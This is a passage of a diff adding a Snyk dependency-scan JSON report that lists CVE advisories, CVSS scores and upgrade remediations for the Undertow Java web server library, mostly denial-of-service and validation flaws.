"https://github.com/undertow-io/undertow/commit/1443a1a2bbb8e32e56788109d8285db250d55c8b", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/undertow-io/undertow/commit/7c5b3ab885b5638fd3f1e8a935d5063d68aa2df3", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/undertow-io/undertow/pull/1331", + "title": "GitHub PR" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2073890", + "title": "Red Hat Bugzilla Bug" + }, + { + "url": "https://issues.redhat.com/browse/UNDERTOW-2060", + "title": "Red Hat Issues" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:50:01.171825Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:47.199026Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:06:56.623925Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:01.171825Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:47.199026Z" + } + ], + "description": "## Overview\n[io.undertow:undertow-core](https://mvnrepository.com/artifact/io.undertow/undertow-core) is a Java web server based on non-blocking IO.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) via an AJP 400 response, when EAP 7 is improperly sending two response packets, those packets have the reuse flag set even though JBoss EAP closes the connection. A failure occurs when the connection is reused after a 400 by `CPING` since it reads in the second `SEND_HEADERS` response packet instead of a `CPONG`.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `io.undertow:undertow-core` to version 2.2.18, 2.3.0.Alpha2 or higher.\n## References\n- [GitHub Commit](https://github.com/undertow-io/undertow/commit/1443a1a2bbb8e32e56788109d8285db250d55c8b)\n- [GitHub Commit](https://github.com/undertow-io/undertow/commit/7c5b3ab885b5638fd3f1e8a935d5063d68aa2df3)\n- [GitHub PR](https://github.com/undertow-io/undertow/pull/1331)\n- [Red Hat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=2073890)\n- [Red Hat Issues](https://issues.redhat.com/browse/UNDERTOW-2060)\n", + "epssDetails": { + "percentile": "0.71500", + "probability": "0.00335", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2022-1319" + ], + "CWE": [ + "CWE-400" + ] + }, + "packageName": "io.undertow:undertow-core", + "proprietary": false, + "creationTime": "2022-08-31T17:18:28.761846Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2022-08-31T17:13:48Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "io.undertow", + "artifactId": "undertow-core" + }, + "publicationTime": "2022-08-31T17:18:28Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:47.199026Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.snyk:log4shell-server@0.0.1-SNAPSHOT", + "io.undertow:undertow-core@2.2.13.Final" + ], + "upgradePath": [ + false, + "io.undertow:undertow-core@2.2.18.Final" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "io.undertow:undertow-core", + "version": "2.2.13.Final" + }, + { + "id": "SNYK-JAVA-IOUNDERTOW-3339519", + "title": "Improper Certificate Validation", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[0,2.2.24.Final)", + "[2.3.0.Alpha1,2.3.5.Final)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.2.24.Final", + "2.3.5.Final" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.5, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "io.undertow:undertow-core", + "references": [ + { + "url": "https://github.com/undertow-io/undertow/commit/a4d3b167126a803cc4f7fb740dd9a6ecabf59342", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/undertow-io/undertow/commit/e5071e52b72529a14d3ec436ae7102cea5d918c4", + "title": "GitHub Commit" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2153260", + "title": "RedHat Bugzilla Bug" + }, + { + "url": "https://access.redhat.com/security/cve/CVE-2022-4492", + "title": "RedHat CVE Database" + }, + { + "url": "https://issues.redhat.com/browse/MTA-93", + "title": "RedHat Issues" + }, + { + "url": "https://github.com/undertow-io/undertow/blob/master/core/src/main/java/io/undertow/security/impl/ClientCertAuthenticationMechanism.java", + "title": "Vulnerable Code" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:52:58.198807Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:54:00.706455Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:56:39.172740Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:52:58.198807Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:54:00.706455Z" + } + ], + "description": "## Overview\n[io.undertow:undertow-core](https://mvnrepository.com/artifact/io.undertow/undertow-core) is a Java web server based on non-blocking IO.\n\nAffected versions of this package are vulnerable to Improper Certificate Validation via the undertow client which does not check the server identity presented by the server certificate in https connections.\n## Remediation\nUpgrade `io.undertow:undertow-core` to version 2.2.24.Final, 2.3.5.Final or higher.\n## References\n- [GitHub Commit](https://github.com/undertow-io/undertow/commit/a4d3b167126a803cc4f7fb740dd9a6ecabf59342)\n- [GitHub Commit](https://github.com/undertow-io/undertow/commit/e5071e52b72529a14d3ec436ae7102cea5d918c4)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=2153260)\n- [RedHat CVE Database](https://access.redhat.com/security/cve/CVE-2022-4492)\n- [RedHat Issues](https://issues.redhat.com/browse/MTA-93)\n- [Vulnerable Code](https://github.com/undertow-io/undertow/blob/master/core/src/main/java/io/undertow/security/impl/ClientCertAuthenticationMechanism.java)\n", + "epssDetails": { + "percentile": "0.35043", + "probability": "0.00081", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2022-4492" + ], + "CWE": [ + "CWE-295" + ], + "GHSA": [ + "GHSA-pfcc-3g6r-8rg8" + ] + }, + "packageName": "io.undertow:undertow-core", + "proprietary": false, + "creationTime": "2023-03-05T09:49:05.782717Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2023-02-23T21:30:16Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "io.undertow", + "artifactId": "undertow-core" + }, + "publicationTime": "2023-03-05T09:49:05.974241Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:54:00.706455Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.snyk:log4shell-server@0.0.1-SNAPSHOT", + "io.undertow:undertow-core@2.2.13.Final" + ], + "upgradePath": [ + false, + "io.undertow:undertow-core@2.2.24.Final" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "io.undertow:undertow-core", + "version": "2.2.13.Final" + }, + { + "id": "SNYK-JAVA-IOUNDERTOW-3358786", + "title": "Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[0,2.2.25.Final)", + "[2.3.0.Alpha1,2.3.6.Final)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.2.25.Final", + "2.3.6.Final" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.3, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "io.undertow:undertow-core", + "references": [ + { + "url": "https://github.com/undertow-io/undertow/commit/f73e724ab39567e889a6f453aadf520953f3b4ef", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/undertow-io/undertow/pull/1477", + "title": "GitHub PR" + }, + { + "url": "https://issues.redhat.com/browse/UNDERTOW-2137", + "title": "Undertow Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:50:01.060024Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:54:00.539446Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:56:20.874470Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:01.060024Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:54:00.539446Z" + } + ], + "description": "## Overview\n[io.undertow:undertow-core](https://mvnrepository.com/artifact/io.undertow/undertow-core) is a Java web server based on non-blocking IO.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) in flow control handling by the browser over HTTP/2. This may cause overhead or a denial of service in the server. This is due to an incomplete fix of [CVE-2021-3629](https://security.snyk.io/vuln/SNYK-JAVA-IOUNDERTOW-2847922).\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `io.undertow:undertow-core` to version 2.2.25.Final, 2.3.6.Final or higher.\n## References\n- [GitHub Commit](https://github.com/undertow-io/undertow/commit/f73e724ab39567e889a6f453aadf520953f3b4ef)\n- [GitHub PR](https://github.com/undertow-io/undertow/pull/1477)\n- [Undertow Issue](https://issues.redhat.com/browse/UNDERTOW-2137)\n", + "epssDetails": { + "percentile": "0.46729", + "probability": "0.00120", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2022-1259" + ], + "CWE": [ + "CWE-400" + ] + }, + "packageName": "io.undertow:undertow-core", + "proprietary": false, + "creationTime": "2023-03-12T11:00:33.646508Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2023-03-12T10:57:54Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "io.undertow", + "artifactId": "undertow-core" + }, + "publicationTime": "2023-03-12T11:00:33.868032Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:54:00.539446Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.snyk:log4shell-server@0.0.1-SNAPSHOT", + "io.undertow:undertow-core@2.2.13.Final" + ], + "upgradePath": [ + false, + "io.undertow:undertow-core@2.2.25.Final" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "io.undertow:undertow-core", + "version": "2.2.13.Final" + }, + { + "id": "SNYK-JAVA-IOUNDERTOW-6567186", + "title": "Improper Input Validation", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.2.32.Final)", + "[2.3.0.Alpha1,2.3.13.Final)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.2.32.Final", + "2.3.13.Final" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.5, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "io.undertow:undertow-core", + "references": [ + { + "url": "https://github.com/undertow-io/undertow/commit/0410f3c4d9b39b754a2203a29834cac51da11258", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/undertow-io/undertow/blob/ddb4aeeb32f7ed58d715124acf1d464fc14b30dd/core/src/main/java/io/undertow/security/impl/FormAuthenticationMechanism.java%23L46", + "title": "Vulnerable Code" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-04-05T13:32:48.961817Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-05-13T12:05:39.932206Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-04-05T13:32:48.961817Z" + } + ], + "description": "## Overview\n[io.undertow:undertow-core](https://mvnrepository.com/artifact/io.undertow/undertow-core) is a Java web server based on non-blocking IO.\n\nAffected versions of this package are vulnerable to Improper Input Validation via the `FormAuthenticationMechanism`. An attacker can exhaust the server's memory, leading to a Denial of Service by sending crafted requests that cause an OutofMemory error.\n## Remediation\nUpgrade `io.undertow:undertow-core` to version 2.2.32.Final, 2.3.13.Final or higher.\n## References\n- [GitHub Commit](https://github.com/undertow-io/undertow/commit/0410f3c4d9b39b754a2203a29834cac51da11258)\n- [Vulnerable Code](https://github.com/undertow-io/undertow/blob/ddb4aeeb32f7ed58d715124acf1d464fc14b30dd/core/src/main/java/io/undertow/security/impl/FormAuthenticationMechanism.java#L46)\n", + "epssDetails": null, + "identifiers": { + "CVE": [ + "CVE-2023-1973" + ], + "CWE": [ + "CWE-20" + ] + }, + "packageName": "io.undertow:undertow-core", + "proprietary": false, + "creationTime": "2024-04-05T14:06:11.114809Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2024-04-04T00:00:00Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "io.undertow", + "artifactId": "undertow-core" + }, + "publicationTime": "2024-04-05T14:06:11.299727Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-05-13T12:05:39.932206Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.snyk:log4shell-server@0.0.1-SNAPSHOT", + "io.undertow:undertow-core@2.2.13.Final" + ], + "upgradePath": [ + false, + "io.undertow:undertow-core@2.2.32.Final" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "io.undertow:undertow-core", + "version": "2.2.13.Final" + }, + { + "id": "SNYK-JAVA-IOUNDERTOW-6669948", + "title": "Allocation of Resources Without Limits or Throttling", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.2.31.Final)", + "[2.3.0.Alpha1,2.3.12.Final)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.2.31.Final", + "2.3.12.Final" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.5, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "io.undertow:undertow-core", + "references": [ + { + "url": "https://github.com/undertow-io/undertow/commit/b0732610112cb2066b5e43a47a11008edfacee02", + "title": "GitHub Commit" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2242099", + "title": "RedHat Bugzilla Bug" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:54:13.170450Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-05-13T12:00:48.159973Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:54:13.170450Z" + } + ], + "description": "## Overview\n[io.undertow:undertow-core](https://mvnrepository.com/artifact/io.undertow/undertow-core) is a Java web server based on non-blocking IO.\n\nAffected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling. An attacker can disrupt service availability by repeatedly sending AJP requests that exceed the configured `max-header-size` attribute in `ajp-listener`, leading to the server closing the TCP connection without returning an AJP response.\r\n\r\n**Note:**\r\n\r\nThis is only exploitable if the `max-header-size` is set to 64 KB or less.\n## Remediation\nUpgrade `io.undertow:undertow-core` to version 2.2.31.Final, 2.3.12.Final or higher.\n## References\n- [GitHub Commit](https://github.com/undertow-io/undertow/commit/b0732610112cb2066b5e43a47a11008edfacee02)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=2242099)\n", + "epssDetails": { + "percentile": "0.21648", + "probability": "0.00053", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2023-5379" + ], + "CWE": [ + "CWE-770" + ] + }, + "packageName": "io.undertow:undertow-core", + "proprietary": false, + "creationTime": "2024-04-21T07:43:26.561967Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2023-12-12T00:00:00Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "io.undertow", + "artifactId": "undertow-core" + }, + "publicationTime": "2024-04-21T07:43:26.742123Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-05-13T12:00:48.159973Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.snyk:log4shell-server@0.0.1-SNAPSHOT", + "io.undertow:undertow-core@2.2.13.Final" + ], + "upgradePath": [ + false, + "io.undertow:undertow-core@2.2.31.Final" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "io.undertow:undertow-core", + "version": "2.2.13.Final" + }, + { + "id": "SNYK-JAVA-IOUNDERTOW-7300152", + "title": "Uncontrolled Resource Consumption", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.2.33.Final)", + "[2.3.0.Final,2.3.14.Final)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.2.33.Final", + "2.3.14.Final" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.7, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "io.undertow:undertow-core", + "references": [ + { + "url": "https://github.com/undertow-io/undertow/commit/90f202ada89b6d9883beed0f1fe10c99d470d9a8", + "title": "GitHub Commit" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2293069", + "title": "Red Hat Bugzilla Bug" + } + ], + "cvssDetails": [], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.7, + "cvssVersion": "4.0", + "modificationTime": "2024-06-24T09:03:55.525177Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-06-24T09:03:55.525177Z" + } + ], + "description": "## Overview\n[io.undertow:undertow-core](https://mvnrepository.com/artifact/io.undertow/undertow-core) is a Java web server based on non-blocking IO.\n\nAffected versions of this package are vulnerable to Uncontrolled Resource Consumption through the handling of URL-encoded request path information on `ajp-listener`. An attacker can cause the server to process incorrect paths, leading to a disruption of service by sending specially crafted concurrent requests.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `io.undertow:undertow-core` to version 2.2.33.Final, 2.3.14.Final or higher.\n## References\n- [GitHub Commit](https://github.com/undertow-io/undertow/commit/90f202ada89b6d9883beed0f1fe10c99d470d9a8)\n- [Red Hat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=2293069)\n", + "epssDetails": { + "percentile": "0.09306", + "probability": "0.00043", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2024-6162" + ], + "CWE": [ + "CWE-400" + ], + "GHSA": [ + "GHSA-9442-gm4v-r222" + ] + }, + "packageName": "io.undertow:undertow-core", + "proprietary": false, + "creationTime": "2024-06-21T06:28:17.382174Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2024-06-20T15:31:19Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "io.undertow", + "artifactId": "undertow-core" + }, + "publicationTime": "2024-06-21T07:17:01.928932Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-06-24T09:03:55.525177Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.snyk:log4shell-server@0.0.1-SNAPSHOT", + "io.undertow:undertow-core@2.2.13.Final" + ], + "upgradePath": [ + false, + "io.undertow:undertow-core@2.2.33.Final" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "io.undertow:undertow-core", + "version": "2.2.13.Final" + }, + { + "id": "SNYK-JAVA-IOUNDERTOW-7300153", + "title": "Uncontrolled Resource Consumption ('Resource Exhaustion')", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "credit": [ + "Bartek Nowotarski" + ], + "semver": { + "vulnerable": [ + "[,2.2.33.Final)", + "[2.3.0.Final,2.3.14.Final)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.2.33.Final", + "2.3.14.Final" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.7, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "io.undertow:undertow-core", + "references": [ + { + "url": "https://httpd.apache.org/security/vulnerabilities_24.html", + "title": "Apache Advisory" + }, + { + "url": "https://github.com/undertow-io/undertow/commit/c27c1e40c945c11f13b210fd72fadf0ae641f3d0", + "title": "Github Commit" + }, + { + "url": "https://github.com/undertow-io/undertow/commit/296636d341dd8c9ff60dae017500c61f051bc42a", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/undertow-io/undertow/commit/d798de663e834450acec1041e44bae938a7b45b6", + "title": "GitHub Commit" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2268277", + "title": "RedHat Bugzilla Bug" + }, + { + "url": "https://www.kb.cert.org/vuls/id/421644", + "title": "Security Notes" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-04-04T13:31:53.396581Z" + }, + { + "assigner": "SUSE", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-05-28T11:02:47.420228Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-06-07T01:11:20.186304Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.7, + "cvssVersion": "4.0", + "modificationTime": "2024-06-24T09:04:33.419941Z" + }, + { + "type": "secondary", + "vector": 